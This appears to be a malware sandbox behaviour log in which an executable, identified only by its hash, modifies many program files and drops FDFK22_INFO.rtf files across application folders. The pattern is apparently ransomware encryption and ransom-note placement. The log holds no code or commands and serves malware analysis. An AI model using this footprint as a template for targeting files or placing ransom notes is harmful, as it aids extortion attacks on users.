Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\manifest.json a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montevideo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogo.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\HST a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pl.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\NewRename.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hr.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\jaccess.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Merida a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar 